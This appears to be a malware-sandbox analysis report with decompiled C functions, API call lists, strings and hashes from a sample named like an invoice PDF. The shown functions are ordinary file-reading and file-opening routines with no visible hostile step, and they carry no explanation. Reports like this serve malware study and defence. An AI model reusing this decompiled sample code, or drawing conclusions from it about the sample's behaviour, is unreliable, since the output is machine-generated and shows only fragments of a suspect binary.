                            • API String ID: 1159605621-2368408649
                            • Opcode ID: 231b0f37b99116c8a8851db98945a2f391cb547835501a8a99fe405c05546fbc
                            • Instruction ID: fccee037749153ab15a95ea8f1cbbed93eb4b509910f58fd01782a4dfe3d8732
                            • Opcode Fuzzy Hash: 231b0f37b99116c8a8851db98945a2f391cb547835501a8a99fe405c05546fbc
                            • Instruction Fuzzy Hash: BD417CB2904241ABD7289B3DEC0599B7B9CBF8432DF080A26F819D1289E634D144C7A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
                            				void* _t14;
                            				signed int _t15;
                            				void* _t18;
                            				signed int _t19;
                            				void* _t20;
                            				signed int _t26;
                            				signed int _t28;
                            				void* _t31;
                            				void* _t32;
                            				signed int* _t33;
                            				void* _t35;
                            				void* _t36;
                            
                            				_t32 = __edx;
                            				_t31 = __ecx;
                            				_t33 = _a4;
                            				if( *_t33 != 0) {
                            					L2:
                            					_t14 = E01311120(_t32, _t33);
                            					_t36 = _t35 + 4;
                            					_t48 = _t14 - 1;
                            					if(_t14 < 1) {
                            						E01319F16(_t32,  *_t33, 0, 2); // executed
                            						_t14 = E0131A488(_t32, _t48,  *_t33); // executed
                            						_t36 = _t36 + 0x10;
                            					}
                            					_t15 = E013113D0(_t32, _t33, _t14);
                            					if(_t15 == 0xffffffff) {
                            						goto L7;
                            					} else {
                            						_t3 =  &(_t33[9]); // 0x1
                            						_push( *_t3);
                            						_t33[0x101b] = 0;
                            						L01317864();
                            						_push(0);
                            						 *0x133c954 = _t15;
                            						_t5 =  &(_t33[7]); // 0xc0335f00
                            						L01317864();
                            						_t6 =  &(_t33[1]); // 0x1a74c085
                            						_t18 = E01319F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
                            						_t7 =  &(_t33[8]); // 0xb85fc35b
                            						_push( *_t7);
                            						L01317864();
                            						_push(_t18);
                            						_t19 = E01319808(_t31);
                            						_t33[2] = _t19;
                            						_t50 = _t19;
                            						if(_t19 != 0) {
                            							_push( *_t33);
                            							_t9 =  &(_t33[8]); // 0xb85fc35b
                            							L01317864();
                            							_t10 =  &(_t33[2]); // 0xc085078b, executed
                            							_t20 = E01319B2B( *_t10, _t19,  *_t9, 1); // executed
                            							__eflags = _t20 - 1;
                            							if(__eflags >= 0) {
                            								_t11 =  &(_t33[8]); // 0xb85fc35b
                            								_push( *_t11);
                            								L01317864();
                            								_t12 =  &(_t33[2]); // 0xc085078b
                            								_t33[3] = _t20 +  *_t12;
                            								__eflags = E01319934( *_t33);
                            								if(__eflags == 0) {
                            									E01311200(_t33);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_push("Error on file\n.");
                            									_t26 = E01311910(__eflags) | 0xffffffff;
                            									__eflags = _t26;
                            									return _t26;
                            								}
                            							} else {
                            								_push("Could not read from file.");
                            								_push("fread");
                            								_t28 = E013117B0(__eflags) | 0xffffffff;
                            								__eflags = _t28;
                            								return _t28;
                            							}
                            						} else {
                            							_push("Could not allocate buffer for TOC.");
                            							_push("malloc");
                            							_t15 = E013117B0(_t50);
                            							goto L7;
                            						}
                            					}
                            				} else {
                            					_t2 =  &(_t33[0x1a]); // 0x131176c
                            					_t15 = E013128C0(_t2, "rb");
                            					_t35 = _t35 + 8;
                            					 *_t33 = _t15;
                            					if(_t15 == 0) {
                            						L7:
                            						return _t15 | 0xffffffff;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}
















                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction ID: fd9acf414977476da447cc55108fdcd8394025dc1c065c84879d1fbc300c5adf
                            • Opcode Fuzzy Hash: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction Fuzzy Hash: 4B21FDB1840702B7DA293B3DEC01B9B7AD5AF2026DF080D28F9D9913A9F763D5508A55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Control-flow graph for function 01322128; graph image not preserved. Legend: Executed / Not Executed]
                            C-Code - Quality: 77%
                            			E01322128(signed int _a4, void* _a8, unsigned int _a12) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				unsigned int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				void* _v32;
                            				long _v36;
                            				void* _v40;
                            				long _v44;
                            				signed int* _t143;
                            				signed int _t145;
                            				intOrPtr _t149;
                            				signed int _t153;
                            				signed int _t155;
                            				signed char _t157;
                            				unsigned int _t158;
                            				intOrPtr _t162;
                            				void* _t163;
                            				signed int _t164;
                            				signed int _t167;
                            				long _t168;
                            				intOrPtr _t175;
                            				signed int _t176;
                            				intOrPtr _t178;
                            				signed int _t180;
                            				signed int _t184;
                            				char _t191;
                            				char* _t192;
                            				char _t199;
                            				char* _t200;
                            				signed char _t211;
                            				signed int _t213;
                            				long _t215;
                            				signed int _t216;
                            				char _t218;
                            				signed char _t222;
                            				signed int _t223;
                            				unsigned int _t224;
                            				intOrPtr _t225;
                            				unsigned int _t229;
                            				intOrPtr _t231;
                            				signed int _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				signed int _t235;
                            				signed char _t236;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t240;
                            				signed int _t241;
                            				signed int _t242;
                            				signed int _t246;
                            				void* _t248;
                            				void* _t249;
                            
                            				_t213 = _a4;
                            				if(_t213 != 0xfffffffe) {
                            					__eflags = _t213;
                            					if(_t213 < 0) {
                            						L58:
                            						_t143 = E0131C9BB();
                            						 *_t143 =  *_t143 & 0x00000000;
                            						__eflags =  *_t143;
                            						 *((intOrPtr*)(E0131C9CE())) = 9;
                            						L59:
                            						_t145 = E01321788();
                            						goto L60;
                            					}
                            					__eflags = _t213 -  *0x1346308; // 0x40
                            					if(__eflags >= 0) {
                            						goto L58;
                            					}
                            					_v24 = 1;
                            					_t239 = _t213 >> 6;
                            					_t235 = (_t213 & 0x0000003f) * 0x30;
                            					_v20 = _t239;
                            					_t149 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
                            					_v28 = _t235;
                            					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                            					_v5 = _t222;
                            					__eflags = _t222 & 0x00000001;
                            					if((_t222 & 0x00000001) == 0) {
                            						goto L58;
                            					}
                            					_t223 = _a12;
                            					__eflags = _t223 - 0x7fffffff;
                            					if(_t223 <= 0x7fffffff) {
                            						__eflags = _t223;
                            						if(_t223 == 0) {
                            							L57:
                            							return 0;
                            						}
                            						__eflags = _v5 & 0x00000002;
                            						if((_v5 & 0x00000002) != 0) {
                            							goto L57;
                            						}
                            						__eflags = _a8;
                            						if(_a8 == 0) {
                            							goto L6;
                            						}
                            						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                            						_v5 = _t153;
                            						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                            						_t246 = 0;
                            						_t155 = _t153 - 1;
                            						__eflags = _t155;
                            						if(_t155 == 0) {
                            							_t236 = _v24;
                            							_t157 =  !_t223;
                            							__eflags = _t236 & _t157;
                            							if((_t236 & _t157) != 0) {
                            								_t158 = 4;
                            								_t224 = _t223 >> 1;
                            								_v16 = _t158;
                            								__eflags = _t224 - _t158;
                            								if(_t224 >= _t158) {
                            									_t158 = _t224;
                            									_v16 = _t224;
                            								}
                            								_t246 = E01320A25(_t224, _t158);
                            								E013209EB(0);
                            								E013209EB(0);
                            								_t249 = _t248 + 0xc;
                            								_v12 = _t246;
                            								__eflags = _t246;
                            								if(_t246 != 0) {
                            									_t162 = E01322807(_t213, 0, 0, _v24);
                            									_t225 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
                            									_t248 = _t249 + 0x10;
                            									_t240 = _v28;
                            									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                            									_t163 = _t246;
                            									 *(_t240 + _t225 + 0x24) = _t236;
                            									_t235 = _t240;
                            									_t223 = _v16;
                            									L21:
                            									_t241 = 0;
                            									_v40 = _t163;
                            									_t215 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
                            									_v36 = _t215;
                            									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                            									_t216 = _a4;
                            									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                            										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                            										_v6 = _t218;
                            										__eflags = _t218 - 0xa;
                            										_t216 = _a4;
                            										if(_t218 != 0xa) {
                            											__eflags = _t223;
                            											if(_t223 != 0) {
                            												_t241 = _v24;
                            												 *_t163 = _v6;
                            												_t216 = _a4;
                            												_t232 = _t223 - 1;
                            												__eflags = _v5;
                            												_v12 = _t163 + 1;
                            												_v16 = _t232;
                            												 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2a)) = 0xa;
                            												if(_v5 != 0) {
                            													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b));
                            													_v6 = _t191;
                            													__eflags = _t191 - 0xa;
                            													if(_t191 != 0xa) {
                            														__eflags = _t232;
                            														if(_t232 != 0) {
                            															_t192 = _v12;
                            															_t241 = 2;
                            															 *_t192 = _v6;
                            															_t216 = _a4;
                            															_t233 = _t232 - 1;
                            															_v12 = _t192 + 1;
                            															_v16 = _t233;
                            															 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b)) = 0xa;
                            															__eflags = _v5 - _v24;
                            															if(_v5 == _v24) {
                            																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c));
                            																_v6 = _t199;
                            																__eflags = _t199 - 0xa;
                            																if(_t199 != 0xa) {
                            																	__eflags = _t233;
                            																	if(_t233 != 0) {
                            																		_t200 = _v12;
                            																		_t241 = 3;
                            																		 *_t200 = _v6;
                            																		_t216 = _a4;
                            																		_t234 = _t233 - 1;
                            																		__eflags = _t234;
                            																		_v12 = _t200 + 1;
                            																		_v16 = _t234;
                            																		 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c)) = 0xa;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            									_t164 = E01328D71(_t216);
                            									__eflags = _t164;
                            									if(_t164 == 0) {
                            										L41:
                            										_v24 = 0;
                            										L42:
                            										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
                            										__eflags = _t167;
                            										if(_t167 == 0) {
                            											L53:
                            											_t168 = GetLastError();
                            											_t241 = 5;
                            											__eflags = _t168 - _t241;
                            											if(_t168 != _t241) {
                            												__eflags = _t168 - 0x6d;
                            												if(_t168 != 0x6d) {
                            													L37:
                            													E0131C998(_t168);
                            													goto L38;
                            												}
                            												_t242 = 0;
                            												goto L39;
                            											}
                            											 *((intOrPtr*)(E0131C9CE())) = 9;
                            											 *(E0131C9BB()) = _t241;
                            											goto L38;
                            										}
                            										_t229 = _a12;
                            										__eflags = _v36 - _t229;
                            										if(_v36 > _t229) {
                            											goto L53;
                            										}
                            										_t242 = _t241 + _v36;
                            										__eflags = _t242;
                            										L45:
                            										_t237 = _v28;
                            										_t175 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
                            										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                            										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                            											__eflags = _v5 - 2;
                            											if(_v5 == 2) {
                            												__eflags = _v24;
                            												_push(_t242 >> 1);
                            												_push(_v40);
                            												_push(_t216);
                            												if(_v24 == 0) {
                            													_t176 = E01321C82();
                            												} else {
                            													_t176 = E01321F94();
                            												}
                            											} else {
                            												_t230 = _t229 >> 1;
                            												__eflags = _t229 >> 1;
                            												_t176 = E01321E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                            											}
                            											_t242 = _t176;
                            										}
                            										goto L39;
                            									}
                            									_t104 =  &_v28; // 0xa
                            									_t231 =  *_t104;
                            									_t178 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
                            									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                            									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                            										goto L41;
                            									}
                            									_t180 = GetConsoleMode(_v32,  &_v44);
                            									__eflags = _t180;
                            									if(_t180 == 0) {
                            										goto L41;
                            									}
                            									__eflags = _v5 - 2;
                            									if(_v5 != 2) {
                            										goto L42;
                            									}
                            									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                            									__eflags = _t184;
                            									if(_t184 != 0) {
                            										_t229 = _a12;
                            										_t242 = _t241 + _v36 * 2;
                            										goto L45;
                            									}
                            									_t168 = GetLastError();
                            									goto L37;
                            								} else {
                            									 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            									 *(E0131C9BB()) = 8;
                            									L38:
                            									_t242 = _t241 | 0xffffffff;
                            									__eflags = _t242;
                            									L39:
                            									E013209EB(_t246);
                            									return _t242;
                            								}
                            							}
                            							L15:
                            							 *(E0131C9BB()) =  *_t206 & _t246;
                            							 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            							E01321788();
                            							goto L38;
                            						}
                            						__eflags = _t155 != 1;
                            						if(_t155 != 1) {
                            							L13:
                            							_t163 = _a8;
                            							_v16 = _t223;
                            							_v12 = _t163;
                            							goto L21;
                            						}
                            						_t211 =  !_t223;
                            						__eflags = _t211 & 0x00000001;
                            						if((_t211 & 0x00000001) == 0) {
                            							goto L15;
                            						}
                            						goto L13;
                            					}
                            					L6:
                            					 *(E0131C9BB()) =  *_t151 & 0x00000000;
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					goto L59;
                            				} else {
                            					 *(E0131C9BB()) =  *_t212 & 0x00000000;
                            					_t145 = E0131C9CE();
                            					 *_t145 = 9;
                            					L60:
                            					return _t145 | 0xffffffff;
                            				}
                            			}



























































                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: 78236698ffccf9f7c0bd7d61901188ca298b659cdec5451fd4b7c839d0a2ac4d
                            • Instruction ID: f737d7feebc91e03a62f3857952f2b1c5323acdf44f7e709eedeafb4a9c49f8a
                            • Opcode Fuzzy Hash: 78236698ffccf9f7c0bd7d61901188ca298b659cdec5451fd4b7c839d0a2ac4d
                            • Instruction Fuzzy Hash: 0FC1D474D0426AAFDF15EFADDC40BAEBBB4AF1A308F044185EA51A7382C7749941CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 42%
                            			E0132BD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v36;
                            				signed int _v44;
                            				void _v48;
                            				char _v72;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t114;
                            				void* _t122;
                            				signed int _t123;
                            				signed char _t124;
                            				signed int _t134;
                            				intOrPtr _t164;
                            				intOrPtr _t180;
                            				signed int* _t190;
                            				signed int _t192;
                            				char _t197;
                            				signed int _t203;
                            				signed int _t206;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t219;
                            				signed int _t225;
                            				signed int _t227;
                            				signed int _t234;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				void* _t240;
                            				signed char _t243;
                            				intOrPtr _t246;
                            				void* _t249;
                            				void* _t253;
                            				void* _t263;
                            				signed int _t264;
                            				signed int _t267;
                            				signed int _t270;
                            				signed int _t271;
                            				void* _t273;
                            				void* _t275;
                            				void* _t276;
                            				void* _t278;
                            				void* _t279;
                            				void* _t281;
                            				void* _t285;
                            
                            				_t240 = __edx;
                            				_t263 = E0132BAF3(__ecx,  &_v72, _a16, _a20, _a24);
                            				_t192 = 6;
                            				memcpy( &_v48, _t263, _t192 << 2);
                            				_t275 = _t273 + 0x1c;
                            				_t249 = _t263 + _t192 + _t192;
                            				_t264 = _t263 | 0xffffffff;
                            				if(_v36 != _t264) {
                            					_t114 = E0131E783(_t240, _t249, _t264, __eflags);
                            					_t190 = _a8;
                            					 *_t190 = _t114;
                            					__eflags = _t114 - _t264;
                            					if(_t114 != _t264) {
                            						_v20 = _v20 & 0x00000000;
                            						_v24 = 0xc;
                            						_t276 = _t275 - 0x18;
                            						 *_a4 = 1;
                            						_push(6);
                            						_v16 =  !(_a16 >> 7) & 1;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t276,  &_v48, 1 << 2);
                            						_t197 = 0;
                            						_t122 = E0132BA5E(); // executed
                            						_t253 = _t122;
                            						_t278 = _t276 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							L11:
                            							_t123 = GetFileType(_t253); // executed
                            							__eflags = _t123;
                            							if(_t123 != 0) {
                            								__eflags = _t123 - 2;
                            								if(_t123 != 2) {
                            									__eflags = _t123 - 3;
                            									_t124 = _v48;
                            									if(_t123 == 3) {
                            										_t124 = _t124 | 0x00000008;
                            										__eflags = _t124;
                            									}
                            								} else {
                            									_t124 = _v48 | 0x00000040;
                            								}
                            								_v5 = _t124;
                            								E0131E6CC(_t197,  *_t190, _t253);
                            								_t243 = _v5 | 0x00000001;
                            								_v5 = _t243;
                            								_v48 = _t243;
                            								 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
                            								_t203 =  *_t190;
                            								_t205 = (_t203 & 0x0000003f) * 0x30;
                            								__eflags = _a16 & 0x00000002;
                            								 *((char*)( *((intOrPtr*)(0x1346108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                            								if((_a16 & 0x00000002) == 0) {
                            									L20:
                            									_v6 = 0;
                            									_push( &_v6);
                            									_push(_a16);
                            									_t279 = _t278 - 0x18;
                            									_t206 = 6;
                            									_push( *_t190);
                            									memcpy(_t279,  &_v48, _t206 << 2);
                            									_t134 = E0132B811(_t190,  &_v48 + _t206 + _t206,  &_v48);
                            									_t281 = _t279 + 0x30;
                            									__eflags = _t134;
                            									if(__eflags == 0) {
                            										 *((char*)( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                            										 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                            										__eflags = _v5 & 0x00000048;
                            										if((_v5 & 0x00000048) == 0) {
                            											__eflags = _a16 & 0x00000008;
                            											if((_a16 & 0x00000008) != 0) {
                            												_t225 =  *_t190;
                            												_t227 = (_t225 & 0x0000003f) * 0x30;
                            												_t164 =  *((intOrPtr*)(0x1346108 + (_t225 >> 6) * 4));
                            												_t87 = _t164 + _t227 + 0x28;
                            												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                            												__eflags =  *_t87;
                            											}
                            										}
                            										_t267 = _v44;
                            										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
                            										if((_t267 & 0xc0000000) != 0xc0000000) {
                            											L31:
                            											__eflags = 0;
                            											return 0;
                            										} else {
                            											__eflags = _a16 & 0x00000001;
                            											if((_a16 & 0x00000001) == 0) {
                            												goto L31;
                            											}
                            											CloseHandle(_v12);
                            											_v44 = _t267 & 0x7fffffff;
                            											_t215 = 6;
                            											_push( &_v24);
                            											_push(_a12);
                            											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
                            											_t246 = E0132BA5E();
                            											__eflags = _t246 - 0xffffffff;
                            											if(_t246 != 0xffffffff) {
                            												_t217 =  *_t190;
                            												_t219 = (_t217 & 0x0000003f) * 0x30;
                            												__eflags = _t219;
                            												 *((intOrPtr*)( *((intOrPtr*)(0x1346108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
                            												goto L31;
                            											}
                            											E0131C998(GetLastError());
                            											 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            											E0131E895( *_t190);
                            											L10:
                            											goto L2;
                            										}
                            									}
                            									_t270 = _t134;
                            									goto L22;
                            								} else {
                            									_t270 = E0132BC6F(_t205,  *_t190);
                            									__eflags = _t270;
                            									if(__eflags != 0) {
                            										L22:
                            										E013218F4(__eflags,  *_t190);
                            										return _t270;
                            									}
                            									goto L20;
                            								}
                            							}
                            							_t271 = GetLastError();
                            							E0131C998(_t271);
                            							 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            							CloseHandle(_t253);
                            							__eflags = _t271;
                            							if(_t271 == 0) {
                            								 *((intOrPtr*)(E0131C9CE())) = 0xd;
                            							}
                            							goto L2;
                            						}
                            						_t234 = _v44;
                            						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                            						if((_t234 & 0xc0000000) != 0xc0000000) {
                            							L9:
                            							_t235 =  *_t190;
                            							_t237 = (_t235 & 0x0000003f) * 0x30;
                            							_t180 =  *((intOrPtr*)(0x1346108 + (_t235 >> 6) * 4));
                            							_t33 = _t180 + _t237 + 0x28;
                            							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                            							__eflags =  *_t33;
                            							E0131C998(GetLastError());
                            							goto L10;
                            						}
                            						__eflags = _a16 & 0x00000001;
                            						if((_a16 & 0x00000001) == 0) {
                            							goto L9;
                            						}
                            						_t285 = _t278 - 0x18;
                            						_v44 = _t234 & 0x7fffffff;
                            						_t239 = 6;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t285,  &_v48, _t239 << 2);
                            						_t197 = 0;
                            						_t253 = E0132BA5E();
                            						_t278 = _t285 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							goto L11;
                            						}
                            						goto L9;
                            					} else {
                            						 *(E0131C9BB()) =  *_t186 & 0x00000000;
                            						 *_t190 = _t264;
                            						 *((intOrPtr*)(E0131C9CE())) = 0x18;
                            						goto L2;
                            					}
                            				} else {
                            					 *(E0131C9BB()) =  *_t188 & 0x00000000;
                            					 *_a8 = _t264;
                            					L2:
                            					return  *((intOrPtr*)(E0131C9CE()));
                            				}
                            			}























































                            0x0132bd1f
                            0x0132bd42
                            0x0132bd46
                            0x0132bd47
                            0x0132bd47
                            0x0132bd47
                            0x0132bd49
                            0x0132bd4f
                            0x0132bd6a
                            0x0132bd6f
                            0x0132bd72
                            0x0132bd74
                            0x0132bd76
                            0x0132bd95
                            0x0132bd9c
                            0x0132bda3
                            0x0132bda6
                            0x0132bdb2
                            0x0132bdb5
                            0x0132bdbd
                            0x0132bdbe
                            0x0132bdc1
                            0x0132bdc1
                            0x0132bdc3
                            0x0132bdc8
                            0x0132bdca
                            0x0132bdcd
                            0x0132bdd5
                            0x0132bdd8
                            0x0132be45
                            0x0132be46
                            0x0132be4c
                            0x0132be4e
                            0x0132be97
                            0x0132be9a
                            0x0132bea3
                            0x0132bea6
                            0x0132bea9
                            0x0132beab
                            0x0132beab
                            0x0132beab
                            0x0132be9c
                            0x0132be9f
                            0x0132be9f
                            0x0132beb0
                            0x0132beb3
                            0x0132bebf
                            0x0132bec4
                            0x0132bed0
                            0x0132beda
                            0x0132bede
                            0x0132bee8
                            0x0132beeb
                            0x0132bef6
                            0x0132befb
                            0x0132bf0b
                            0x0132bf0e
                            0x0132bf12
                            0x0132bf13
                            0x0132bf19
                            0x0132bf1e
                            0x0132bf21
                            0x0132bf23
                            0x0132bf25
                            0x0132bf2a
                            0x0132bf2d
                            0x0132bf2f
                            0x0132bf59
                            0x0132bf7d
                            0x0132bf81
                            0x0132bf85
                            0x0132bf87
                            0x0132bf8b
                            0x0132bf8d
                            0x0132bf97
                            0x0132bf9a
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bf8b
                            0x0132bfa6
                            0x0132bfb2
                            0x0132bfb4
                            0x0132c03f
                            0x0132c03f
                            0x00000000
                            0x0132bfba
                            0x0132bfba
                            0x0132bfbe
                            0x00000000
                            0x00000000
                            0x0132bfc3
                            0x0132bfd5
                            0x0132bfdd
                            0x0132bfe0
                            0x0132bfe1
                            0x0132bfe4
                            0x0132bfeb
                            0x0132bff0
                            0x0132bff3
                            0x0132c027
                            0x0132c031
                            0x0132c031
                            0x0132c03b
                            0x00000000
                            0x0132c03b
                            0x0132bffc
                            0x0132c015
                            0x0132c01c
                            0x0132be3f
                            0x00000000
                            0x0132be3f
                            0x0132bfb4
                            0x0132bf31
                            0x00000000
                            0x0132befd
                            0x0132bf04
                            0x0132bf07
                            0x0132bf09
                            0x0132bf33
                            0x0132bf35
                            0x00000000
                            0x0132bf3b
                            0x00000000
                            0x0132bf09
                            0x0132befb
                            0x0132be56
                            0x0132be59
                            0x0132be74
                            0x0132be79
                            0x0132be7f
                            0x0132be81
                            0x0132be8c
                            0x0132be8c
                            0x00000000
                            0x0132be81
                            0x0132bdda
                            0x0132bde1
                            0x0132bde3
                            0x0132be1a
                            0x0132be1a
                            0x0132be24
                            0x0132be27
                            0x0132be2e
                            0x0132be2e
                            0x0132be2e
                            0x0132be3a
                            0x00000000
                            0x0132be3a
                            0x0132bde5
                            0x0132bde9
                            0x00000000
                            0x00000000
                            0x0132bdeb
                            0x0132bdfa
                            0x0132bdff
                            0x0132be02
                            0x0132be03
                            0x0132be06
                            0x0132be06
                            0x0132be0d
                            0x0132be0f
                            0x0132be12
                            0x0132be15
                            0x0132be18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132bd78
                            0x0132bd7d
                            0x0132bd80
                            0x0132bd87
                            0x00000000
                            0x0132bd87
                            0x0132bd51
                            0x0132bd56
                            0x0132bd5c
                            0x0132bd5e
                            0x00000000
                            0x0132bd63

                            APIs
                              • Part of subcall function 0132BA5E: CreateFileW.KERNEL32(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            • GetLastError.KERNEL32 ref: 0132BE33
                            • __dosmaperr.LIBCMT ref: 0132BE3A
                            • GetFileType.KERNEL32(00000000), ref: 0132BE46
                            • GetLastError.KERNEL32 ref: 0132BE50
                            • __dosmaperr.LIBCMT ref: 0132BE59
                            • CloseHandle.KERNEL32(00000000), ref: 0132BE79
                            • CloseHandle.KERNEL32(?), ref: 0132BFC3
                            • GetLastError.KERNEL32 ref: 0132BFF5
                            • __dosmaperr.LIBCMT ref: 0132BFFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
